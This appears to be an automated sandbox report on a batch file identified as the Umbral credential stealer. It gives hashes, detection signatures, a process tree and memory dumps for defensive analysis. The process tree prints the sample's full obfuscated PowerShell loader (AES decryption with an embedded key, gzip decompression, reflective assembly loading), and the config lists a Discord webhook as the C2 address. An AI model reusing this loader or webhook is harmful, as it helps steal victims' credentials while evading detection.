Overview

overview

10

Static

static

1

Umbral.bat

windows10-2004-x64

10

Analysis

  • max time kernel
    118s
  • max time network
    99s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12-10-2024 09:03

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Umbral.bat

  • Size

    468KB

  • MD5

    50c1619dde4c59211f2220d19fd7a2ff

  • SHA1

    f89a90307b00ff0bd2733642ea43427bc304c730

  • SHA256

    b99eb432b5d440a41faf8ed09c3df4ff0cf82ca13fefed8c2cb56ca96960ab4d

  • SHA512

    ed591a3357cc3e3487b708f2e08a74683c93d5e5e16d1978f90f4dc37b77f147bb36ba3cb55318d146c0831f7636baa22006b6c9960db3e8a72dbdc798efb627

  • SSDEEP

    12288:7WdGCJGwwo92cPLI0O8JtFDUB9PvBxdCAI2hlojjF9xq:SNswwxcjJngP3PdCVuM9xq

Score
10/10
umbraldefense_evasionexecutionstealer

Malware Config

Extracted

Family

umbral

C2

https://discord.com/api/webhooks/1289565581565104128/6_mwv0w1S5A0l9XLPkwW6UmUZxdAw3mP7dh5lsWmFsgqgu5kJGEszt1-zAw_BajgNh6i

Signatures

  • Detect Umbral payload 1 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

    stealerumbral
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

    execution
  • Indicator Removal: Clear Windows Event Logs 1 TTPs 2 IoCs

    Clear Windows Event Logs to hide the activity of an intrusion.

    defense_evasion
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 3 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies data under HKEY_USERS 1 IoCs
  • Modifies registry class 26 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k DcomLaunch -p
    1⤵
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:796
    • C:\Windows\system32\wbem\wmiprvse.exe
      C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
      2⤵
        PID:2504
      • C:\Windows\system32\backgroundTaskHost.exe
        "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
        2⤵
          PID:3936
        • C:\Windows\system32\backgroundTaskHost.exe
          "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
          2⤵
            PID:3940
          • C:\Windows\system32\backgroundTaskHost.exe
            "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
            2⤵
              PID:3900
            • C:\Windows\system32\DllHost.exe
              C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
              2⤵
                PID:5028
            • C:\Windows\system32\svchost.exe
              C:\Windows\system32\svchost.exe -k RPCSS -p
              1⤵
                PID:900
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                1⤵
                  PID:956
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                  1⤵
                    PID:392
                  • C:\Windows\System32\svchost.exe
                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                    1⤵
                      PID:868
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p
                      1⤵
                        PID:1056
                      • C:\Windows\System32\svchost.exe
                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                        1⤵
                          PID:1104
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                          1⤵
                            PID:1112
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                            1⤵
                              PID:1136
                            • C:\Windows\System32\svchost.exe
                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                              1⤵
                              • Indicator Removal: Clear Windows Event Logs
                              PID:1184
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                              1⤵
                                PID:1240
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                1⤵
                                  PID:1308
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                                  1⤵
                                    PID:1332
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                    1⤵
                                      PID:1420
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                      1⤵
                                        PID:1464
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                        1⤵
                                          PID:1540
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                          1⤵
                                            PID:1556
                                          • C:\Windows\system32\svchost.exe
                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                            1⤵
                                              PID:1660
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                              1⤵
                                                PID:1680
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                                1⤵
                                                  PID:1748
                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                                  1⤵
                                                    PID:1768
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                    1⤵
                                                      PID:1824
                                                    • C:\Windows\system32\svchost.exe
                                                      C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                      1⤵
                                                        PID:1884
                                                      • C:\Windows\System32\svchost.exe
                                                        C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                        1⤵
                                                          PID:1896
                                                        • C:\Windows\system32\svchost.exe
                                                          C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                          1⤵
                                                            PID:1980
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                            1⤵
                                                              PID:1428
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                              1⤵
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:2112
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p
                                                              1⤵
                                                                PID:2140
                                                              • C:\Windows\System32\svchost.exe
                                                                C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                                1⤵
                                                                  PID:2184
                                                                • C:\Windows\System32\svchost.exe
                                                                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                                  1⤵
                                                                    PID:2260
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                    1⤵
                                                                      PID:2436
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                      1⤵
                                                                        PID:2444
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                        1⤵
                                                                          PID:2636
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                          1⤵
                                                                          • Drops file in System32 directory
                                                                          PID:2688
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                          1⤵
                                                                            PID:2752
                                                                          • C:\Windows\System32\svchost.exe
                                                                            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                            1⤵
                                                                              PID:2816
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                              1⤵
                                                                                PID:2844
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                                1⤵
                                                                                  PID:2192
                                                                                • C:\Windows\system32\svchost.exe
                                                                                  C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                  1⤵
                                                                                    PID:3532
                                                                                  • C:\Windows\Explorer.EXE
                                                                                    C:\Windows\Explorer.EXE
                                                                                    1⤵
                                                                                    • Modifies registry class
                                                                                    • Suspicious behavior: GetForegroundWindowSpam
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                    • Suspicious use of WriteProcessMemory
                                                                                    PID:3632
                                                                                    • C:\Windows\system32\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Umbral.bat"
                                                                                      2⤵
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:3660
                                                                                      • C:\Windows\system32\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JBDmY5Rm32yFC2eFK/K6i05UDHc2UnMQkJErjy0URRw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hIqIhLZZ4mABnJftMk1zig=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $LaItK=New-Object System.IO.MemoryStream(,$param_var); $BkPnB=New-Object System.IO.MemoryStream; $dqAwB=New-Object System.IO.Compression.GZipStream($LaItK, [IO.Compression.CompressionMode]::Decompress); $dqAwB.CopyTo($BkPnB); $dqAwB.Dispose(); $LaItK.Dispose(); $BkPnB.Dispose(); $BkPnB.ToArray();}function execute_function($param_var,$param2_var){ $aRoAH=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $GgeTI=$aRoAH.EntryPoint; $GgeTI.Invoke($null, $param2_var);}$cxvio = 'C:\Users\Admin\AppData\Local\Temp\Umbral.bat';$host.UI.RawUI.WindowTitle = $cxvio;$jncrM=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($cxvio).Split([Environment]::NewLine);foreach ($EHnfk in $jncrM) { if ($EHnfk.StartsWith('qqYQzFlhLQoZwGnqjKHD')) { $uHvVU=$EHnfk.Substring(20); break; }}$payloads_var=[string[]]$uHvVU.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                                                                                        3⤵
                                                                                          PID:3484
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                                                                          3⤵
                                                                                          • Blocklisted process makes network request
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:556
                                                                                          • C:\Windows\System32\Wbem\wmic.exe
                                                                                            "wmic.exe" csproduct get uuid
                                                                                            4⤵
                                                                                              PID:1836
                                                                                        • C:\Windows\system32\taskmgr.exe
                                                                                          "C:\Windows\system32\taskmgr.exe" /4
                                                                                          2⤵
                                                                                          • Checks SCSI registry key(s)
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious behavior: GetForegroundWindowSpam
                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                          • Suspicious use of SendNotifyMessage
                                                                                          PID:3156
                                                                                      • C:\Windows\system32\svchost.exe
                                                                                        C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                        1⤵
                                                                                          PID:3756
                                                                                        • C:\Windows\system32\svchost.exe
                                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                          1⤵
                                                                                            PID:4804
                                                                                          • C:\Windows\System32\svchost.exe
                                                                                            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                            1⤵
                                                                                              PID:4000
                                                                                            • C:\Windows\system32\svchost.exe
                                                                                              C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                              1⤵
                                                                                                PID:3828
                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                1⤵
                                                                                                • Modifies data under HKEY_USERS
                                                                                                PID:4488
                                                                                              • C:\Windows\System32\svchost.exe
                                                                                                C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                1⤵
                                                                                                  PID:2056
                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
                                                                                                  1⤵
                                                                                                    PID:4676

                                                                                                  Network

                                                                                                  MITRE ATT&CK Enterprise v15

                                                                                                  Replay Monitor

                                                                                                  Loading Replay Monitor...

                                                                                                  Downloads

                                                                                                  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0xe5tpwm.zl0.ps1
                                                                                                    Filesize

                                                                                                    60B

                                                                                                    MD5

                                                                                                    d17fe0a3f47be24a6453e9ef58c94641

                                                                                                    SHA1

                                                                                                    6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                    SHA256

                                                                                                    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                    SHA512

                                                                                                    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                    Download Submit

                                                                                                  • memory/392-77-0x00007FFC7CBF0000-0x00007FFC7CC00000-memory.dmp

                                                                                                    Filesize

                                                                                                    64KB

                                                                                                    Download

                                                                                                  • memory/556-18-0x00007FFCAC9F3000-0x00007FFCAC9F4000-memory.dmp

                                                                                                    Filesize

                                                                                                    4KB

                                                                                                    Download

                                                                                                  • memory/556-115-0x00007FFC9DF53000-0x00007FFC9DF55000-memory.dmp

                                                                                                    Filesize

                                                                                                    8KB

                                                                                                    Download

                                                                                                  • memory/556-12-0x00007FFC9DF50000-0x00007FFC9EA11000-memory.dmp

                                                                                                    Filesize

                                                                                                    10.8MB

                                                                                                    Download

                                                                                                  • memory/556-13-0x0000020CCAA50000-0x0000020CCAA94000-memory.dmp

                                                                                                    Filesize

                                                                                                    272KB

                                                                                                    Download

                                                                                                  • memory/556-14-0x0000020CCAEA0000-0x0000020CCAF16000-memory.dmp

                                                                                                    Filesize

                                                                                                    472KB

                                                                                                    Download

                                                                                                  • memory/556-15-0x0000020CB0790000-0x0000020CB0798000-memory.dmp

                                                                                                    Filesize

                                                                                                    32KB

                                                                                                    Download

                                                                                                  • memory/556-16-0x0000020CCAE20000-0x0000020CCAE7A000-memory.dmp

                                                                                                    Filesize

                                                                                                    360KB

                                                                                                    Download

                                                                                                  • memory/556-134-0x00007FFC9DF50000-0x00007FFC9EA11000-memory.dmp

                                                                                                    Filesize

                                                                                                    10.8MB

                                                                                                    Download

                                                                                                  • memory/556-0-0x00007FFC9DF53000-0x00007FFC9DF55000-memory.dmp

                                                                                                    Filesize

                                                                                                    8KB

                                                                                                    Download

                                                                                                  • memory/556-133-0x00007FFC9DF50000-0x00007FFC9EA11000-memory.dmp

                                                                                                    Filesize

                                                                                                    10.8MB

                                                                                                    Download

                                                                                                  • memory/556-79-0x00007FFC9DF50000-0x00007FFC9EA11000-memory.dmp

                                                                                                    Filesize

                                                                                                    10.8MB

                                                                                                    Download

                                                                                                  • memory/556-11-0x00007FFC9DF50000-0x00007FFC9EA11000-memory.dmp

                                                                                                    Filesize

                                                                                                    10.8MB

                                                                                                    Download

                                                                                                  • memory/556-114-0x0000020CCAF20000-0x0000020CCAF60000-memory.dmp

                                                                                                    Filesize

                                                                                                    256KB

                                                                                                    Download

                                                                                                  • memory/556-1-0x0000020CCA9B0000-0x0000020CCA9D2000-memory.dmp

                                                                                                    Filesize

                                                                                                    136KB

                                                                                                    Download

                                                                                                  • memory/868-76-0x00007FFC7CBF0000-0x00007FFC7CC00000-memory.dmp

                                                                                                    Filesize

                                                                                                    64KB

                                                                                                    Download

                                                                                                  • memory/956-67-0x00007FFC7CBF0000-0x00007FFC7CC00000-memory.dmp

                                                                                                    Filesize

                                                                                                    64KB

                                                                                                    Download

                                                                                                  • memory/1240-82-0x00007FFC7CBF0000-0x00007FFC7CC00000-memory.dmp

                                                                                                    Filesize

                                                                                                    64KB

                                                                                                    Download

                                                                                                  • memory/1308-80-0x00007FFC7CBF0000-0x00007FFC7CC00000-memory.dmp

                                                                                                    Filesize

                                                                                                    64KB

                                                                                                    Download

                                                                                                  • memory/1540-72-0x00007FFC7CBF0000-0x00007FFC7CC00000-memory.dmp

                                                                                                    Filesize

                                                                                                    64KB

                                                                                                    Download

                                                                                                  • memory/1556-73-0x00007FFC7CBF0000-0x00007FFC7CC00000-memory.dmp

                                                                                                    Filesize

                                                                                                    64KB

                                                                                                    Download

                                                                                                  • memory/1768-71-0x00007FFC7CBF0000-0x00007FFC7CC00000-memory.dmp

                                                                                                    Filesize

                                                                                                    64KB

                                                                                                    Download

                                                                                                  • memory/1884-81-0x00007FFC7CBF0000-0x00007FFC7CC00000-memory.dmp

                                                                                                    Filesize

                                                                                                    64KB

                                                                                                    Download

                                                                                                  • memory/2056-74-0x00007FFC7CBF0000-0x00007FFC7CC00000-memory.dmp

                                                                                                    Filesize

                                                                                                    64KB

                                                                                                    Download

                                                                                                  • memory/2112-78-0x00007FFC7CBF0000-0x00007FFC7CC00000-memory.dmp

                                                                                                    Filesize

                                                                                                    64KB

                                                                                                    Download

                                                                                                  • memory/2184-83-0x00007FFC7CBF0000-0x00007FFC7CC00000-memory.dmp

                                                                                                    Filesize

                                                                                                    64KB

                                                                                                    Download

                                                                                                  • memory/2260-69-0x00007FFC7CBF0000-0x00007FFC7CC00000-memory.dmp

                                                                                                    Filesize

                                                                                                    64KB

                                                                                                    Download

                                                                                                  • memory/3632-66-0x00007FFCBCC0D000-0x00007FFCBCC0E000-memory.dmp

                                                                                                    Filesize

                                                                                                    4KB

                                                                                                    Download

                                                                                                  • memory/3632-29-0x00007FFC7CBF0000-0x00007FFC7CC00000-memory.dmp

                                                                                                    Filesize

                                                                                                    64KB

                                                                                                    Download

                                                                                                  • memory/3632-17-0x0000000002910000-0x000000000293A000-memory.dmp

                                                                                                    Filesize

                                                                                                    168KB

                                                                                                    Download

                                                                                                  • memory/3756-70-0x00007FFC7CBF0000-0x00007FFC7CC00000-memory.dmp

                                                                                                    Filesize

                                                                                                    64KB

                                                                                                    Download

                                                                                                  • memory/4488-68-0x00007FFC7CBF0000-0x00007FFC7CC00000-memory.dmp

                                                                                                    Filesize

                                                                                                    64KB

                                                                                                    Download

                                                                                                  • memory/4676-75-0x00007FFC7CBF0000-0x00007FFC7CC00000-memory.dmp

                                                                                                    Filesize

                                                                                                    64KB

                                                                                                    Download